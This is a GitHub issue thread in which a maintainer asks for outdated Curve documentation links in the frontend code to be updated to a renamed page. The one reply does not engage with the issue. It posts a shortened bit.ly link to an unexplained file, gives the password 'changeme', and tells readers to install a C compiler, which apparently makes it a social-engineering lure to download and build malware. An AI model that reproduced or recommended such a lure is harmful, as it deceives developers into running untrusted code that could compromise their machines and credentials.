### ISSUE TITLE
Resources: Loan Details Page Changed

### ISSUE THREAD

**Issue by saint-rat** [curvefi/curve-frontend#369]
The loan details page has been changed to a loan concepts page.  There are 4 links to this page on the UI, I've created a temporary redirect so the UI links aren't broken but the following code in these pages:

https://github.com/search?q=repo%3Acurvefi%2Fcurve-frontend+%2F.*resources%5C.curve%5C.fi%5C%2Fcrvusd%5C%2Floan-details%5C%2F.*%2F&type=code

Should be updated from:

https://resources.curve.fi/crvusd/loan-details/#hard-liquidations

To the following link at your earliest convience:

https://resources.curve.fi/crvusd/loan-concepts/#hard-liquidations

Thanks :)

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
